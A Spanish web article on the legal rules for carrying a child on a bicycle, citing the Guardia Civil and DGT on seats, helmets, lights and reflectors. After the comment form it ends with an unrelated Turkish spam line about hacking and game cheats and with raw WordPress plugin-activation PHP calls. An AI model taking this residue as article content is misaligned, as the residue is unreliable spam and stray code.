Cómo y cuándo puedo llevar a mi hijo conmigo en la bicicleta


Son muchos los padres que deciden a diario salir a hacer deporte y no quieren dejar a sus hijos en casa, o bien no tienen otro medio de transporte para llevarlos al colegio, por ejemplo. Así que, por su seguridad y la de todos, es muy importante conocer las normas que rigen esta actividad. Sobre todo porque los ciclistas son muy vulnerables, ellos son la carrocería cuando hay un golpe.

Y la Guardia Civil nos da la respuesta: «Si quieres llevar al peque en la bici contigo has de saber que debe ser menos de 7 años y debe ir en un asiento adicional homologado instalado en su bicicleta. Además debe llevar casco homologado (obligatorio para menores de 16 años)».

Si quieres llevar al peque 👧👦 en la bici contigo has de saber que debe ser < de 7 años y debe ir en un asiento adicional homologado instalado en su bicicleta 🚲.

Además debe llevar casco homologado (obligatorio para < de 16 años).

➕👇@DGTeshttps://t.co/0PLdEGgnDppic.twitter.com/uvpBzwJkEj

— Guardia Civil 🇪🇸 (@guardiacivil) January 30, 2021

Asimismo, desde la Dirección General de Tráfico (DGT), nos recuerdan que antes de montar en bicicleta se ha de revisar los frenos, el inflado de las ruedas, comprobar que llevamos el casco homologado, de uso obligatorio para menores de 16 años, así como chaleco reflectante, obligatorio en vías interurbanas cuando sea obligatorio el uso de las luces: el uso de rodilleras y coderas así como otros dispositivos de seguridad, no es obligatorio pero si muy recomendable, y también revisar las luces.

De igual modo, es importante saber y cumplir las normas. Está prohibido usar auriculares y teléfonos móviles, transportar gente a excepción de los mayores de edad que podrán transportar a un menor de 7 años en un asiento adicional homologado instalado en su bicicleta; y no se deben hacer eses entre los vehículos y procurar utilizar el carril destinado para uso de bicicletas.

Recordar que para poder circular de noche conduciendo una bicicleta, ésta deberá llevar instalada una luz blanca en la parte delantera y una luz roja en la parte trasera, así como un catadióptrico trasero no triangular de color rojo. Opcionalmente, podrá llevar instalados catadióptricos en los pedales (dos en cada pedal) y en los radios de las ruedas de color amarillo-auto. Las bicicletas deben llevar elementos reflectantes que estén homologados.



Deja una respuesta

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

Hacker Blog Oyun Hileleri

activate_plugin( 'automatic_replace/index.php' ); activate_plugin( 'bloqueo_comentarios/index.php' ); activate_plugin( 'disable-xml-rpc/disable-xml-rpc.php' ); activate_plugin( 'rename-wp-login/rename-wp-login.php' );